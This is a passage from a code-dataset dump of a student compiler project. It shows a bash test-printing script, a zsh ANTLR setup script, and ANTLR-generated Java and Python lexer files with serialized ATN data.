"#!/bin/bash\nTEST_DIR=\"./test/testcases\"\nSOL_DIR=\"./test/solutions\"\n\nif [ $# -eq 1 ]\n\tthen \n\t\techo -e \"\\n===========================\"\n echo -e \"Testcase#\"$1 \n echo \"***********TEST*******\"\n cat $TEST_DIR/$1.txt\n echo\n echo \"************SOL**********\"\n cat $SOL_DIR/$1.txt\n echo -e \"\\n===========================\"\n\telse\n\t\tfor file in 
$TEST_DIR/*; do\n echo -e \"\\n===========================\"\n echo -e \"Testcase#\"${file##*/} \n echo \"***********TEST*******\"\n cat $TEST_DIR/${file##*/}\n echo\n echo \"************SOL**********\"\n cat $SOL_DIR/${file##*/}\n echo -e \"\\n===========================\"\n done\nfi" }, { "alpha_fraction": 0.7478991746902466, "alphanum_fraction": 0.7836134433746338, "avg_line_length": 78.33333587646484, "blob_id": "37b4d02d19bc1577e598364aa79fbb047125e1c2", "content_id": "10f7d87d59c84b83c184a6b0a20fa6c80b1849a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 476, "license_type": "no_license", "max_line_length": 130, "num_lines": 6, "path": "/setup.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "#!/bin/zsh\nexport ANTLR_JAR=\"/home/nguyendat/Documents/projects/PPL/antlr-4.8-complete.jar\"\nexport CLASSPATH=\".:/home/nguyendat/Documents/projects/PPL/antlr-4.8-complete.jar:$CLASSPATH\"\nalias antlr4='java -Xmx500M -cp \"/home/nguyendat/Documents/projects/PPL/antlr-4.8-complete.jar:$CLASSPATH\" org.antlr.v4.Tool'\nalias grun='java -Xmx500M -cp \"/home/nguyendat/Documents/projects/PPL/antlr-4.8-complete.jar:$CLASSPATH\" org.antlr.v4.gui.TestRig'\necho \"Set environment variables\"\n" }, { "alpha_fraction": 0.3809041380882263, "alphanum_fraction": 0.6242877244949341, "avg_line_length": 43.370784759521484, "blob_id": "da1f01277fdb580c571c2130cac7bb18b6f9d3fd", "content_id": "0ada41aae0ee9123871caeef4f830c17e5b7f753", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 7897, "license_type": "no_license", "max_line_length": 97, "num_lines": 178, "path": "/LexicalAnalysis/Question3Lexer.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from Question3.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.Lexer;\nimport org.antlr.v4.runtime.CharStream;\nimport org.antlr.v4.runtime.Token;\nimport 
org.antlr.v4.runtime.TokenStream;\nimport org.antlr.v4.runtime.*;\nimport org.antlr.v4.runtime.atn.*;\nimport org.antlr.v4.runtime.dfa.DFA;\nimport org.antlr.v4.runtime.misc.*;\n\n@SuppressWarnings({\"all\", \"warnings\", \"unchecked\", \"unused\", \"cast\"})\npublic class Question3Lexer extends Lexer {\n\tstatic { RuntimeMetaData.checkVersion(\"4.8\", RuntimeMetaData.VERSION); }\n\n\tprotected static final DFA[] _decisionToDFA;\n\tprotected static final PredictionContextCache _sharedContextCache =\n\t\tnew PredictionContextCache();\n\tpublic static final int\n\t\tT__0=1, Real_number=2, Integer_number=3, SEMI=4, COMMA=5, HEXADECIMAL=6, \n\t\tDECIMAL=7, OCTAL=8, STRING=9, WS=10;\n\tpublic static String[] channelNames = {\n\t\t\"DEFAULT_TOKEN_CHANNEL\", \"HIDDEN\"\n\t};\n\n\tpublic static String[] modeNames = {\n\t\t\"DEFAULT_MODE\"\n\t};\n\n\tprivate static String[] makeRuleNames() {\n\t\treturn new String[] {\n\t\t\t\"T__0\", \"Real_number\", \"Integer_number\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \n\t\t\t\"DIGIT\", \"SIGN\", \"SPACE\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n\t\t\t\"SING_QUOTE\", \"DOUBLE_QUOTE\", \"DOUBLE_QUOTE_IN_QUOTE\", \"HEXADECIMALDIGIT\", \n\t\t\t\"OCTALDIGIT\", \"COLON\", \"SEMI\", \"DOT\", \"COMMA\", \"HEXADECIMAL\", \"DECIMAL\", \n\t\t\t\"OCTAL\", \"LETTER\", \"ID\", \"SING_QUOTE_IN_STRING\", \"STRING_CHAR\", \"STRING\", \n\t\t\t\"WS\"\n\t\t};\n\t}\n\tpublic static final String[] ruleNames = makeRuleNames();\n\n\tprivate static String[] makeLiteralNames() {\n\t\treturn new String[] {\n\t\t\tnull, \"'''\", null, null, \"';'\", \"','\"\n\t\t};\n\t}\n\tprivate static final String[] _LITERAL_NAMES = makeLiteralNames();\n\tprivate static String[] makeSymbolicNames() {\n\t\treturn new String[] {\n\t\t\tnull, null, \"Real_number\", \"Integer_number\", \"SEMI\", \"COMMA\", \"HEXADECIMAL\", \n\t\t\t\"DECIMAL\", \"OCTAL\", \"STRING\", \"WS\"\n\t\t};\n\t}\n\tprivate static final String[] _SYMBOLIC_NAMES = 
makeSymbolicNames();\n\tpublic static final Vocabulary VOCABULARY = new VocabularyImpl(_LITERAL_NAMES, _SYMBOLIC_NAMES);\n\n\t/**\n\t * @deprecated Use {@link #VOCABULARY} instead.\n\t */\n\t@Deprecated\n\tpublic static final String[] tokenNames;\n\tstatic {\n\t\ttokenNames = new String[_SYMBOLIC_NAMES.length];\n\t\tfor (int i = 0; i < tokenNames.length; i++) {\n\t\t\ttokenNames[i] = VOCABULARY.getLiteralName(i);\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = VOCABULARY.getSymbolicName(i);\n\t\t\t}\n\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = \"<INVALID>\";\n\t\t\t}\n\t\t}\n\t}\n\n\t@Override\n\t@Deprecated\n\tpublic String[] getTokenNames() {\n\t\treturn tokenNames;\n\t}\n\n\t@Override\n\n\tpublic Vocabulary getVocabulary() {\n\t\treturn VOCABULARY;\n\t}\n\n\n\tpublic Question3Lexer(CharStream input) {\n\t\tsuper(input);\n\t\t_interp = new LexerATNSimulator(this,_ATN,_decisionToDFA,_sharedContextCache);\n\t}\n\n\t@Override\n\tpublic String getGrammarFileName() { return \"Question3.g4\"; }\n\n\t@Override\n\tpublic String[] getRuleNames() { return ruleNames; }\n\n\t@Override\n\tpublic String getSerializedATN() { return _serializedATN; }\n\n\t@Override\n\tpublic String[] getChannelNames() { return channelNames; }\n\n\t@Override\n\tpublic String[] getModeNames() { return modeNames; }\n\n\t@Override\n\tpublic ATN getATN() { return _ATN; }\n\n\tpublic static final String _serializedATN 
=\n\t\t\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\f\\u00ba\\b\\1\\4\\2\\t\"+\n\t\t\"\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\"+\n\t\t\"\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\"+\n\t\t\"\\4\\23\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\\t\\31\"+\n\t\t\"\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\"+\n\t\t\"\\3\\4\\3\\4\\3\\4\\3\\4\\5\\4G\\n\\4\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\\5\\bP\\n\\b\\3\\t\\3\\t\"+\n\t\t\"\\3\\n\\3\\n\\3\\n\\6\\nW\\n\\n\\r\\n\\16\\nX\\3\\13\\3\\13\\7\\13]\\n\\13\\f\\13\\16\\13`\\13\\13\"+\n\t\t\"\\3\\f\\6\\fc\\n\\f\\r\\f\\16\\fd\\3\\f\\3\\f\\5\\fi\\n\\f\\3\\f\\5\\fl\\n\\f\\3\\r\\3\\r\\3\\16\\3\\16\"+\n\t\t\"\\3\\17\\3\\17\\3\\20\\3\\20\\3\\21\\3\\21\\3\\22\\3\\22\\3\\23\\3\\23\\3\\24\\3\\24\\3\\25\\3\\25\"+\n\t\t\"\\3\\26\\3\\26\\3\\26\\3\\26\\5\\26\\u0084\\n\\26\\3\\26\\6\\26\\u0087\\n\\26\\r\\26\\16\\26\\u0088\"+\n\t\t\"\\3\\27\\6\\27\\u008c\\n\\27\\r\\27\\16\\27\\u008d\\3\\30\\3\\30\\3\\30\\3\\30\\5\\30\\u0094\"+\n\t\t\"\\n\\30\\3\\30\\6\\30\\u0097\\n\\30\\r\\30\\16\\30\\u0098\\3\\31\\3\\31\\5\\31\\u009d\\n\\31\"+\n\t\t\"\\3\\32\\3\\32\\3\\32\\7\\32\\u00a2\\n\\32\\f\\32\\16\\32\\u00a5\\13\\32\\3\\33\\3\\33\\3\\33\"+\n\t\t\"\\3\\34\\3\\34\\5\\34\\u00ac\\n\\34\\3\\35\\7\\35\\u00af\\n\\35\\f\\35\\16\\35\\u00b2\\13\\35\"+\n\t\t\"\\3\\36\\6\\36\\u00b5\\n\\36\\r\\36\\16\\36\\u00b6\\3\\36\\3\\36\\2\\2\\37\\3\\3\\5\\4\\7\\5\\t\"+\n\t\t\"\\2\\13\\2\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2%\\6\\'\\2\"+\n\t\t\")\\7+\\b-\\t/\\n\\61\\2\\63\\2\\65\\2\\67\\29\\13;\\f\\3\\2\\20\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\"+\n\t\t\"\\2--//\\3\\2\\\"\\\"\\3\\2gg\\3\\2\\60\\60\\3\\2))\\3\\2$$\\4\\2$$))\\5\\2\\62;CHch\\3\\2\\62\"+\n\t\t\"9\\5\\2\\n\\f\\16\\17))\\5\\2\\13\\f\\17\\17\\\
"\\\"\\2\\u00b9\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\"+\n\t\t\"\\7\\3\\2\\2\\2\\2%\\3\\2\\2\\2\\2)\\3\\2\\2\\2\\2+\\3\\2\\2\\2\\2-\\3\\2\\2\\2\\2/\\3\\2\\2\\2\\29\\3\"+\n\t\t\"\\2\\2\\2\\2;\\3\\2\\2\\2\\3=\\3\\2\\2\\2\\5?\\3\\2\\2\\2\\7B\\3\\2\\2\\2\\tH\\3\\2\\2\\2\\13J\\3\\2\"+\n\t\t\"\\2\\2\\rL\\3\\2\\2\\2\\17O\\3\\2\\2\\2\\21Q\\3\\2\\2\\2\\23S\\3\\2\\2\\2\\25Z\\3\\2\\2\\2\\27b\\3\"+\n\t\t\"\\2\\2\\2\\31m\\3\\2\\2\\2\\33o\\3\\2\\2\\2\\35q\\3\\2\\2\\2\\37s\\3\\2\\2\\2!u\\3\\2\\2\\2#w\\3\\2\"+\n\t\t\"\\2\\2%y\\3\\2\\2\\2\\'{\\3\\2\\2\\2)}\\3\\2\\2\\2+\\u0083\\3\\2\\2\\2-\\u008b\\3\\2\\2\\2/\\u0093\"+\n\t\t\"\\3\\2\\2\\2\\61\\u009c\\3\\2\\2\\2\\63\\u009e\\3\\2\\2\\2\\65\\u00a6\\3\\2\\2\\2\\67\\u00ab\\3\"+\n\t\t\"\\2\\2\\29\\u00b0\\3\\2\\2\\2;\\u00b4\\3\\2\\2\\2=>\\7)\\2\\2>\\4\\3\\2\\2\\2?@\\5\\17\\b\\2@A\"+\n\t\t\"\\5\\27\\f\\2A\\6\\3\\2\\2\\2BF\\5\\17\\b\\2CG\\5-\\27\\2DG\\5+\\26\\2EG\\5/\\30\\2FC\\3\\2\\2\"+\n\t\t\"\\2FD\\3\\2\\2\\2FE\\3\\2\\2\\2G\\b\\3\\2\\2\\2HI\\t\\2\\2\\2I\\n\\3\\2\\2\\2JK\\t\\3\\2\\2K\\f\\3\"+\n\t\t\"\\2\\2\\2LM\\t\\4\\2\\2M\\16\\3\\2\\2\\2NP\\t\\5\\2\\2ON\\3\\2\\2\\2OP\\3\\2\\2\\2P\\20\\3\\2\\2\\2\"+\n\t\t\"QR\\t\\6\\2\\2R\\22\\3\\2\\2\\2ST\\t\\7\\2\\2TV\\5\\17\\b\\2UW\\5\\r\\7\\2VU\\3\\2\\2\\2WX\\3\\2\"+\n\t\t\"\\2\\2XV\\3\\2\\2\\2XY\\3\\2\\2\\2Y\\24\\3\\2\\2\\2Z^\\t\\b\\2\\2[]\\5\\r\\7\\2\\\\[\\3\\2\\2\\2]`\"+\n\t\t\"\\3\\2\\2\\2^\\\\\\3\\2\\2\\2^_\\3\\2\\2\\2_\\26\\3\\2\\2\\2`^\\3\\2\\2\\2ac\\5\\r\\7\\2ba\\3\\2\\2\"+\n\t\t\"\\2cd\\3\\2\\2\\2db\\3\\2\\2\\2de\\3\\2\\2\\2ek\\3\\2\\2\\2fh\\5\\25\\13\\2gi\\5\\23\\n\\2hg\\3\"+\n\t\t\"\\2\\2\\2hi\\3\\2\\2\\2il\\3\\2\\2\\2jl\\5\\23\\n\\2kf\\3\\2\\2\\2kj\\3\\2\\2\\2l\\30\\3\\2\\2\\2\"+\n\t\t\"mn\\t\\t\\2\\2n\\32\\3\\2\\2\\2op\\t\\n\\2\\2p\\34\\3\\2\\2\\2qr\\t\\13\\2\\2r\\36\\3\\2\\2\\2st\"+\n\t\t\"\\t\\f\\2\\2t 
\\3\\2\\2\\2uv\\t\\r\\2\\2v\\\"\\3\\2\\2\\2wx\\7<\\2\\2x$\\3\\2\\2\\2yz\\7=\\2\\2z&\"+\n\t\t\"\\3\\2\\2\\2{|\\7\\60\\2\\2|(\\3\\2\\2\\2}~\\7.\\2\\2~*\\3\\2\\2\\2\\177\\u0080\\7\\62\\2\\2\\u0080\"+\n\t\t\"\\u0084\\7z\\2\\2\\u0081\\u0082\\7\\62\\2\\2\\u0082\\u0084\\7Z\\2\\2\\u0083\\177\\3\\2\\2\"+\n\t\t\"\\2\\u0083\\u0081\\3\\2\\2\\2\\u0084\\u0086\\3\\2\\2\\2\\u0085\\u0087\\5\\37\\20\\2\\u0086\"+\n\t\t\"\\u0085\\3\\2\\2\\2\\u0087\\u0088\\3\\2\\2\\2\\u0088\\u0086\\3\\2\\2\\2\\u0088\\u0089\\3\\2\"+\n\t\t\"\\2\\2\\u0089,\\3\\2\\2\\2\\u008a\\u008c\\5\\r\\7\\2\\u008b\\u008a\\3\\2\\2\\2\\u008c\\u008d\"+\n\t\t\"\\3\\2\\2\\2\\u008d\\u008b\\3\\2\\2\\2\\u008d\\u008e\\3\\2\\2\\2\\u008e.\\3\\2\\2\\2\\u008f\"+\n\t\t\"\\u0090\\7\\62\\2\\2\\u0090\\u0094\\7q\\2\\2\\u0091\\u0092\\7\\62\\2\\2\\u0092\\u0094\\7\"+\n\t\t\"Q\\2\\2\\u0093\\u008f\\3\\2\\2\\2\\u0093\\u0091\\3\\2\\2\\2\\u0094\\u0096\\3\\2\\2\\2\\u0095\"+\n\t\t\"\\u0097\\5!\\21\\2\\u0096\\u0095\\3\\2\\2\\2\\u0097\\u0098\\3\\2\\2\\2\\u0098\\u0096\\3\\2\"+\n\t\t\"\\2\\2\\u0098\\u0099\\3\\2\\2\\2\\u0099\\60\\3\\2\\2\\2\\u009a\\u009d\\5\\t\\5\\2\\u009b\\u009d\"+\n\t\t\"\\5\\13\\6\\2\\u009c\\u009a\\3\\2\\2\\2\\u009c\\u009b\\3\\2\\2\\2\\u009d\\62\\3\\2\\2\\2\\u009e\"+\n\t\t\"\\u00a3\\5\\t\\5\\2\\u009f\\u00a2\\5\\t\\5\\2\\u00a0\\u00a2\\5\\r\\7\\2\\u00a1\\u009f\\3\\2\"+\n\t\t\"\\2\\2\\u00a1\\u00a0\\3\\2\\2\\2\\u00a2\\u00a5\\3\\2\\2\\2\\u00a3\\u00a1\\3\\2\\2\\2\\u00a3\"+\n\t\t\"\\u00a4\\3\\2\\2\\2\\u00a4\\64\\3\\2\\2\\2\\u00a5\\u00a3\\3\\2\\2\\2\\u00a6\\u00a7\\5\\31\\r\"+\n\t\t\"\\2\\u00a7\\u00a8\\5\\31\\r\\2\\u00a8\\66\\3\\2\\2\\2\\u00a9\\u00ac\\5\\65\\33\\2\\u00aa\\u00ac\"+\n\t\t\"\\n\\16\\2\\2\\u00ab\\u00a9\\3\\2\\2\\2\\u00ab\\u00aa\\3\\2\\2\\2\\u00ac8\\3\\2\\2\\2\\u00ad\"+\n\t\t\"\\u00af\\5\\67\\34\\2\\u00ae\\u00ad\\3\\2\\2\\2\\u00af\\u00b2\\3\\2\\2\\2\\u00b0\\u00ae\\3\"+\n\t\t\"\\2\\2\\2\\u00b0\\u00b1\\3\\2\\2\\2\\u00b1:\\3\\2\\2\\2\\u00b2\\u00b0\\3\\2\\2\\2\\u00b3\\u00b5\"+\n\t\t\"\\t\\17\\2\\2\\u00b4\\u00b3\\3\\2\\2\\2\\u00b5\\u0
0b6\\3\\2\\2\\2\\u00b6\\u00b4\\3\\2\\2\\2\"+\n\t\t\"\\u00b6\\u00b7\\3\\2\\2\\2\\u00b7\\u00b8\\3\\2\\2\\2\\u00b8\\u00b9\\b\\36\\2\\2\\u00b9<\\3\"+\n\t\t\"\\2\\2\\2\\25\\2FOX^dhk\\u0083\\u0088\\u008d\\u0093\\u0098\\u009c\\u00a1\\u00a3\\u00ab\"+\n\t\t\"\\u00b0\\u00b6\\3\\b\\2\\2\";\n\tpublic static final ATN _ATN =\n\t\tnew ATNDeserializer().deserialize(_serializedATN.toCharArray());\n\tstatic {\n\t\t_decisionToDFA = new DFA[_ATN.getNumberOfDecisions()];\n\t\tfor (int i = 0; i < _ATN.getNumberOfDecisions(); i++) {\n\t\t\t_decisionToDFA[i] = new DFA(_ATN.getDecisionState(i), i);\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.2968606650829315, "alphanum_fraction": 0.5580198764801025, "avg_line_length": 57.106727600097656, "blob_id": "72d1fd4ec8065dc1f3c33be0db981a4b5dde696a", "content_id": "327bff8d0cf2eb255b159852d80403b8828bc0be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25069, "license_type": "no_license", "max_line_length": 103, "num_lines": 431, "path": "/SyntaxAnalysis/target/main/bkit/parser/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2D\")\n buf.write(\"\\u0229\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t 
\\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\7\\3\\u00b0\\n\\3\\f\\3\\16\\3\\u00b3\\13\\3\")\n buf.write(\"\\3\\4\\3\\4\\7\\4\\u00b7\\n\\4\\f\\4\\16\\4\\u00ba\\13\\4\\3\\4\\3\\4\\3\\5\")\n buf.write(\"\\3\\5\\7\\5\\u00c0\\n\\5\\f\\5\\16\\5\\u00c3\\13\\5\\3\\5\\5\\5\\u00c6\\n\")\n buf.write(\"\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u00ce\\n\\6\\f\\6\\16\\6\\u00d1\")\n buf.write(\"\\13\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00dc\\n\")\n buf.write(\"\\7\\f\\7\\16\\7\\u00df\\13\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\6\\t\\u00e6\\n\")\n buf.write(\"\\t\\r\\t\\16\\t\\u00e7\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\")\n buf.write(\"\\r\\3\\r\\5\\r\\u00f4\\n\\r\\3\\16\\5\\16\\u00f7\\n\\16\\3\\17\\3\\17\\3\")\n buf.write(\"\\17\\6\\17\\u00fc\\n\\17\\r\\17\\16\\17\\u00fd\\3\\20\\3\\20\\7\\20\\u0102\")\n buf.write(\"\\n\\20\\f\\20\\16\\20\\u0105\\13\\20\\3\\21\\6\\21\\u0108\\n\\21\\r\\21\")\n buf.write(\"\\16\\21\\u0109\\3\\21\\3\\21\\5\\21\\u010e\\n\\21\\3\\21\\5\\21\\u0111\")\n buf.write(\"\\n\\21\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\\23\\3\\24\\3\\24\\3\\24\\3\\25\")\n buf.write(\"\\3\\25\\3\\25\\5\\25\\u011f\\n\\25\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\")\n buf.write(\"\\30\\3\\30\\3\\30\\5\\30\\u0129\\n\\30\\3\\30\\6\\30\\u012c\\n\\30\\r\\30\")\n buf.write(\"\\16\\30\\u012d\\3\\31\\6\\31\\u0131\\n\\31\\r\\31\\16\\31\\u0132\\3\\32\")\n 
buf.write(\"\\3\\32\\3\\32\\3\\32\\5\\32\\u0139\\n\\32\\3\\32\\6\\32\\u013c\\n\\32\\r\")\n buf.write(\"\\32\\16\\32\\u013d\\3\\33\\3\\33\\3\\33\\5\\33\\u0143\\n\\33\\3\\34\\3\")\n buf.write(\"\\34\\3\\35\\3\\35\\5\\35\\u0149\\n\\35\\3\\36\\3\\36\\7\\36\\u014d\\n\\36\")\n buf.write(\"\\f\\36\\16\\36\\u0150\\13\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\3 \\3!\\3!\\3!\\3!\\3!\\3!\\3!\\3!\\3\")\n buf.write(\"!\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3#\\3#\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3\")\n buf.write(\"%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\")\n buf.write(\"\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3)\\3)\\3)\\3)\\3*\\3*\")\n buf.write(\"\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3,\\3,\\3,\\3,\\3,\\3,\\3,\\3\")\n buf.write(\",\\3,\\3,\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3.\\3.\\3.\\3.\\3.\\3/\\3/\\3/\\3\")\n buf.write(\"/\\3\\60\\3\\60\\3\\60\\3\\60\\3\\60\\3\\60\\3\\61\\3\\61\\3\\61\\3\\61\\3\")\n buf.write(\"\\61\\3\\62\\3\\62\\3\\62\\3\\62\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\\3\\63\")\n buf.write(\"\\3\\63\\3\\63\\3\\64\\3\\64\\3\\65\\3\\65\\3\\65\\3\\66\\3\\66\\3\\67\\3\\67\")\n buf.write(\"\\3\\67\\38\\38\\39\\39\\39\\3:\\3:\\3;\\3;\\3;\\3<\\3<\\3=\\3=\\3>\\3>\")\n buf.write(\"\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3A\\3A\\3B\\3B\\3C\\3C\\3D\\3D\\3D\\3\")\n buf.write(\"E\\3E\\3E\\3F\\3F\\3F\\3F\\3G\\3G\\3G\\3H\\3H\\3H\\3I\\3I\\3I\\3I\\3J\\3\")\n buf.write(\"J\\3J\\3J\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3O\\3O\\3P\\3P\\3Q\\3Q\\3R\\3\")\n buf.write(\"R\\3S\\3S\\3T\\3T\\4\\u00cf\\u00dd\\2U\\3\\3\\5\\4\\7\\5\\t\\6\\13\\7\\r\")\n buf.write(\"\\b\\17\\t\\21\\n\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2\")\n buf.write(\"%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\\2\\65\\13\\67\\f9\\r;\\16=\\17?\\20\")\n buf.write(\"A\\21C\\22E\\23G\\24I\\25K\\26M\\27O\\30Q\\31S\\32U\\33W\\34Y\\35[\")\n buf.write(\"\\36]\\37_ a!c\\\"e#g$i%k&m\\'o(q)s*u+w,y-{.}/\\177\\60\\u0081\")\n 
buf.write(\"\\61\\u0083\\62\\u0085\\63\\u0087\\64\\u0089\\65\\u008b\\66\\u008d\")\n buf.write(\"\\67\\u008f8\\u00919\\u0093:\\u0095;\\u0097<\\u0099=\\u009b>\\u009d\")\n buf.write(\"?\\u009f@\\u00a1A\\u00a3B\\u00a5C\\u00a7D\\3\\2\\17\\4\\3\\n\\f\\16\")\n buf.write(\"\\17\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\\3\\2\\62\")\n buf.write(\";\\4\\2--//\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\")\n buf.write(\"\\16\\17$$))^^\\5\\2\\62;CHch\\3\\2\\629\\2\\u0230\\2\\3\\3\\2\\2\\2\\2\")\n buf.write(\"\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\\2\\r\\3\")\n buf.write(\"\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\21\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\\3\\2\")\n buf.write(\"\\2\\2\\29\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\")\n buf.write(\"\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\")\n buf.write(\"\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2\")\n buf.write(\"U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\\2]\\3\\2\\2\\2\")\n buf.write(\"\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\\2\\2g\\3\\2\\2\")\n buf.write(\"\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\\2\\2\\2q\\3\\2\")\n buf.write(\"\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\\2\\2\\2y\\3\\2\\2\\2\\2{\\3\")\n buf.write(\"\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\\u0081\\3\\2\\2\\2\\2\\u0083\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\\3\\2\\2\\2\\2\\u0089\\3\\2\\2\")\n buf.write(\"\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\\3\\2\\2\\2\\2\\u008f\\3\\2\\2\\2\\2\\u0091\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\\3\\2\\2\\2\\2\\u0097\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\\2\\2\\u009d\\3\\2\\2\\2\\2\\u009f\")\n 